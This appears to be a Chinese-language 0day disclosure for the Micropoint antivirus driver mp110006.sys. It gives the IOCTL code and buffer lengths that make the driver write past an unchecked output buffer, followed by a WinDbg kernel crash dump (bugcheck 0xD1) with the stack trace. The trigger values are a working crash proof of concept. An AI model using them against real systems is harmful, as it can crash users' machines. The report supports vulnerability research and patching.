微点2 mp110006.sys驱动0day

DeviceIoControl参数:
ioControlCode=8000005E
inputAddress=0xD091BB5C
inputLen=0x00000000
outputAddress=0x022FF4A8
outputLen=0xA9E20D28
DeviceIoControl结果：失败！
DeviceIoControl参数:
ioControlCode=8000005E
inputAddress=0xD091BB5C
inputLen=0x00000000
outputAddress=0x022FF4A8
outputLen=0x00000020 （没有检查这个长度）
*** Fatal System Error: 0x000000d1
                       (0xFA0C10100x000000020x000000010xF9B20972)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.

TRAP_FRAME:  f7f73aa4 -- (.trap 0xfffffffff7f73aa4)
ErrCode = 00000002
eax=00000000 ebx=80f73d80 ecx=00000000 edx=00000000 esi=fa0c0fe8 edi=fa0c0fec
eip=f9b20972 esp=f7f73b18 ebp=f7f73b48 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
mp110006!f1023+0x806:
f9b20972 894628          mov     dword ptr [esi+28h]eax ds:0023:fa0c1010=???????? 
               //输出长度是0x20，但mp110006中没有检查直接写+0x28处的内存，导致内存错误！！！
Resetting default scope
LAST_CONTROL_TRANSFER:  from 804f89f7 to 80527fe8
STACK_TEXT: 
f7f73658 804f89f7 00000003 f7f739b4 00000000 nt!RtlpBreakWithStatusInstruction
f7f736a4 804f95e4 00000003 fa0c1010 f9b20972 nt!KiBugCheckDebugBreak+0x19
f7f73a84 80540a93 0000000a fa0c1010 00000002 nt!KeBugCheck2+0x574
f7f73a84 f9b20972 0000000a fa0c1010 00000002 nt!KiTrap0E+0x233
WARNING: Stack unwind information not available. Following frames may be wrong.
f7f73b48 f9b1f79c f7f73bac 00000028 00000020 mp110006!f1023+0x806
f7f73b64 f9d3ed75 f7f73bac fa0c04a8 80e82230 mp110006!f1015+0x22
f7f73bb4 804ef003 815b3830 811b2238 806d12d0 mp110005+0x2d75
f7f73bc4 80574e4e 811b22a8 80f8f5a8 811b2238 nt!IopfCallDriver+0x31
f7f73bd8 80575cdd 815b3830 811b2238 80f8f5a8 nt!IopSynchronousServiceTail+0x60
f7f73c80 8056e63a 00000184 00000000 00000000 nt!Iop**ControlFile+0x5e7
f7f73cb4 f746337f 00000184 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
f7f73d34 8053da48 00000184 00000000 00000000 BehaviorMon!HookNtDeviceIoControlFile+0xccf [e:\work\iocontrolfuzzer\behaviormon_driver\ssdt\ssdt.c @ 5112]
f7f73d34 7c92eb94 00000184 00000000 00000000 nt!KiFastCallEntry+0xf8
022ff410 7c92d8ef 7c801671 00000184 00000000 ntdll!KiFastSystemCallRet
022ff414 7c801671 00000184 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
022ff474 0054c4a0 00000184 8000005e d091bb5c kernel32!DeviceIoControl+0xdd
022fffb4 7c80b699 00dafe70 77d70088 00000d34 BehaviorMon_400000+0x14c4a0
022fffe0 01cbff80 00000000 800005dc 00000000 kernel32!BaseThreadStart+0x37
022fffec 00000000 005585e8 00dafe70 00000000 0x1cbff80